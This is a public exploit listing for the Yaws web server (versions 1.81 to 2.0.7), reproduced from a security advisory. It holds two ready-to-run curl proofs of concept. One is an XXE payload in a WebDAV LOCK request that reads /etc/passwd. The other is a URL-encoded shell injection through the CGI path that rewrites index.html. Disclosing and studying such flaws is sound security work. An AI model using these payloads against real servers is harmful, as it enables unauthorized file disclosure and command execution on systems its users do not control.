Exploit for Yaws 2.0.7 XML Injection / Command Injection CVE-2020-24379 CVE-2020-24916

Name: Exploit for Yaws 2.0.7 XML Injection / Command Injection CVE-2020-24379 CVE-2020-24916
Rating: 5 (620 reviews)

2020-09-08 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:159106
# Exploit Title: Multiple vulnerabilities in Yaws web server  
# Date: 2020-08-10  
# Exploit Author: Alexey Pronin （vulnbe）  
# Vendor Homepage: http://yaws.hyber.org/  
# Software Link: https://github.com/erlyaws/yaws  
# Versions affected: 1.81 - 2.0.7  
# CVE: CVE-2020-24379, CVE-2020-24916  
  
1. Description:  
----------------------  
  
Yaws versions 1.81 to 2.0.7 are vulnerable to XXE and OS command injections.  
  
2. XXE injection Proof of Concept (CVE-2020-24379)  
----------------------  
  
curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \  
--data-binary @- << EOF  
<?xml version="1.0" encoding="utf-8" ?>  
<!DOCTYPE r [  
<!ELEMENT r ANY >  
<!ENTITY sp SYSTEM "file:///etc/passwd">  
]>  
<d:lockinfo xmlns:d="DAV:">  
<d:lockscope><d:exclusive/></d:lockscope>  
<d:locktype><d:write/></d:locktype>  
<d:owner>  
<d:href><r>&sp;</r></d:href>  
</d:owner>  
</d:lockinfo>  
EOF  
  
3. OS command injection Proof of Concept (CVE-2020-24916)  
----------------------  
  
curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22'  
  
4. References  
----------------------  
  
* Vulnerability details: https://vuln.be/post/yaws-xxe-and-shell-injections/  
* XXE injection PoC: https://github.com/vulnbe/poc-yaws-dav-xxe)  
* Shell injection PoC: https://github.com/vulnbe/poc-yaws-cgi-shell-injection